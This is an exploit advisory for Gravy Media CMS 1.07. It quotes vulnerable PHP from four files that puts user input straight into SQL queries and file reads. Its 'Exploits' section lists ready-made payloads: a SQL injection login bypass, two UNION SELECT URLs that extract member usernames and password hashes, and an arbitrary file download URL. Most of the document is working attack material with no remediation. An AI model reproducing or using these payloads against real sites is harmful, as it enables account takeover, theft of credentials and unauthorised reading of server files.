Gravy Media CMS 1.07 Multiple Remote Vulnerabilities

######################################################################################### [0x01] Informations: Name : Gravy Media Cms 1.07 Download : http://www.gravy-media.com/downloads.php Vulnerability : Multiple Sql Injections & Arbitrary File Download Author : x0r Contact : andry2000@hotmail.it Notes : Proud To Be Italian Greetz : // ######################################################################################### [0x02] Bug: Bugged file is /[path]/login.php [..] viewmsg.php [..] rate.php [..]forcedownload.php [code] //IF SUBMIT PRESSED FOR LOGIN if(isset($_POST[\'submit\'])) { $get_app = mysql_query(\"SELECT * FROM `members` WHERE username = \'\".$_POST[\'username\'].\"\' AND user_password = \'\".md5($_POST[\'password\']).\"\'\"); [/code] [code] //you\'ve to be logged //We need to grab the msg_id variable from the URL. $msg_id = $_REQUEST[\'msg_id\']; //Get all of the information about the message with and id number of the one sent through the URL $view_msg = mysql_query(\"SELECT * FROM messages WHERE id = \'$msg_id\'\"); $msg = mysql_fetch_array($view_msg); [/code] [code] include \"connect.php\"; $action = $_GET[\"action\"]; if (!$action) $action = $_POST[\"action\"]; //print\"action = $action\"; if ($action == \"rate\"){ $filename = $_GET[\"file\"]; $getcount = mysql_query(\"SELECT * FROM files WHERE image=\'$filename\'\"); [/code] [code] $filename = $_GET[\'file\']; //Huge thank you to eLouai for this simple but powerful add-on // required for IE, otherwise Content-disposition is ignored if(ini_get(\'zlib.output_compression\')) ini_set(\'zlib.output_compression\', \'Off\'); // addition by Jorg Weske $file_extension = strtolower(substr(strrchr($filename,\".\"),1)); if( $filename == \"\" ) { echo \"<html><title>eLouai\'s Download Script</title><body>ERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath</body></html>\"; exit; } elseif ( ! file_exists( $filename ) ) { echo \"<html><title>eLouai\'s Download Script</title><body>ERROR: File not found. USE force-download.php?file=filepath</body></html>\"; exit; }; switch( $file_extension ) { case \"pdf\": $ctype=\"application/pdf\"; break; case \"exe\": $ctype=\"application/octet-stream\"; break; case \"zip\": $ctype=\"application/zip\"; break; case \"doc\": $ctype=\"application/msword\"; break; case \"xls\": $ctype=\"application/vnd.ms-excel\"; break; case \"ppt\": $ctype=\"application/vnd.ms-powerpoint\"; break; case \"gif\": $ctype=\"image/gif\"; break; case \"png\": $ctype=\"image/png\"; break; case \"jpeg\": case \"jpg\": $ctype=\"image/jpg\"; break; default: $ctype=\"application/force-download\"; } header(\"Pragma: public\"); // required header(\"Expires: 0\"); header(\"Cache-Control: must-revalidate, post-check=0, pre-check=0\"); header(\"Cache-Control: private\",false); // required for certain browsers header(\"Content-Type: $ctype\"); // change, added quotes to allow spaces in filenames, by Rajkumar Singh header(\"Content-Disposition: attachment; filename=\\\"\".basename($filename).\"\\\";\" ); header(\"Content-Transfer-Encoding: binary\"); header(\"Content-Length: \".filesize($filename)); readfile(\"$filename\"); exit(); [/code] ######################################################################################### [0x03] Exploits: 1- admin\' or \' 1=1-- 2- [LoginRequired] http://site.it/viewmsg.php?msg_id=\' union select 0,0,0,concat(username,char(54),user_password),0,0 from members-- 3- http://site.it/rate.php?action=rate&file=\' union select 0,0,0,concat(username,user_password),0,0 from members-- 4- http://site.it/forcedownload.php?file=[file] ########################################################################################